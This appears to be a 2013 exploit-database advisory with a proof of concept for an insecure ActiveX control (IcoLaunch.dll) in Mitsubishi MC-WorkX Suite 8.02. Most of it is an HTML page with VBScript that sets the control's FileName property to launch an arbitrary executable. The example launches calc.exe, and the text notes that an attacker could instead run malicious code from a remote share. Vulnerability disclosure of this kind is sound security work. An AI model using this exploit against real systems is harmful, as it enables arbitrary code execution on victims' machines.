Mitsubishi MC-WorkX Suite Insecure ActiveX Control IcoLaunch.dl

2013.09.15

Credit: Blake

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

<html>
<object classid='clsid:C28A127E-4A85-11D3-A5FF-00A0249E352D' id='target'></object>
<!--
Mitsubishi MC-WorkX Suite Insecure ActiveX Control - IcoLaunch.dll
Vendor: http://www.meau.com
Version: MC-WorkX 8.02
Tested on: Windows XP SP3 / IE 6
Download: http://www.meau.com/functions/dms/getfile.asp?ID=035000000000000001000000908800000
Author: Blake
 
CLSID: C28A127E-4A85-11D3-A5FF-00A0249E352D
ProgId: ICOLAUNCHLib.LaunchCtl
Path: C:\Program Files\Mitsubishi Electric Automation\MC-WorX\Bin\IcoLaunch.dll
MemberName: FileName
Safe for scripting: True
Safe for init: True
Kill Bit: False
-->
 
<title>Mitsubishi MC-WorkX Suite Insecure ActiveX Control (IcoLaunch)</title>
<p>This proof of concept will launch an arbritrary executable when the Login Client button is clicked. An attacker could use this to have the victim launch malicious code from a remote share. Calc is used in this example.</p>
 
<script language='vbscript'>
file="C:\\WINDOWS\\system32\\calc.exe"
target.FileName = file
</script>

References:

http://www.meau.com/functions/dms/getfile.asp?ID=035000000000000001000000908800000

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Mitsubishi MC-WorkX Suite Insecure ActiveX Control IcoLaunch.dl

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.